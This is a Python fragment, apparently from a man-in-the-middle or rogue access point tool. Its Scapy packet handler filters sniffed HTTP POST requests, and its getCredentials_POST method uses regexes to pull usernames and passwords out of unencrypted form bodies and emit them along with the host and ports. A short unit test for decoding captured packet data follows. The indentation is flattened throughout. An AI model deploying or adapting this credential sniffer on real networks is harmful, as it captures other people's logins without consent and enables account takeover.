def filterPackets(self, pkt):
if not pkt.haslayer(http.HTTPRequest):
return
try:
if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
self.dport = pkt[TCP].dport
self.sport = pkt[TCP].sport
self.src_ip_port = str(pkt[IP].src) + ":" + str(self.sport)
self.dst_ip_port = str(pkt[IP].dst) + ":" + str(self.dport)
http_layer = pkt.getlayer(http.HTTPRequest)
ip_layer = pkt.getlayer(IP)
if str(http_layer.fields["Method"], "utf-8") == "POST":
self.getCredentials_POST(
pkt.getlayer(Raw).load,
http_layer.fields["Host"],
http_layer.fields["Headers"],
self.dst_ip_port,
self.src_ip_port,
{
"IP": ip_layer.fields,
"Headers": http_layer.fields
},
)
data = {
"urlsCap": {
"IP": ip_layer.fields,
"Headers": http_layer.fields
}
}
with decoded(data) as data_decoded:
self.output.emit(data_decoded)
except:
pass
def getCredentials_POST(self, payload, url, header, dport, sport, pkt):
user_regex = ("([Ee]mail|%5B[Ee]mail%5D|[Uu]ser|[Uu]sername|"
"[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[Ii][Dd])=([^&|;]*)")
pw_regex = ("([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][Ss][Ww]|"
"[Pp]asswrd|[Pp]assw|%5B[Pp]assword%5D)=([^&|;]*)")
username = re.findall(user_regex, str(payload, "utf-8"))
password = re.findall(pw_regex, str(payload, "utf-8"))
if not username == [] and not password == []:
data = {
"POSTCreds": {
"Url": str(url),
"Destination": "{}/{}".format(sport, dport),
"Packets": pkt,
"Data": {
"User": username[0][1],
"Pass": password[0][1],
"Payload": payload,
},
}
}
with decoded(data) as data_decoded:
self.output.emit(data_decoded)
def test_decoded_data(self):
global result
data = {
"IP": {
"version": 4,
"src": "10.0.0.21".encode(),
"dst": "216.58.202.227".encode(),
"ihl": 5,
"tos": 0,
},
"Headers": {
"Connection": "Keep-Alive".encode(),
"Method": "GET".encode(),
"Path": "/generate_204".encode(),
"Http-Version": "HTTP/1.1".encode(),
},
}
# decode byte array to str ascii
with decoded(data) as data_decoded:
self.data_decoded = data_decoded
self.assertEqual(result, self.data_decoded)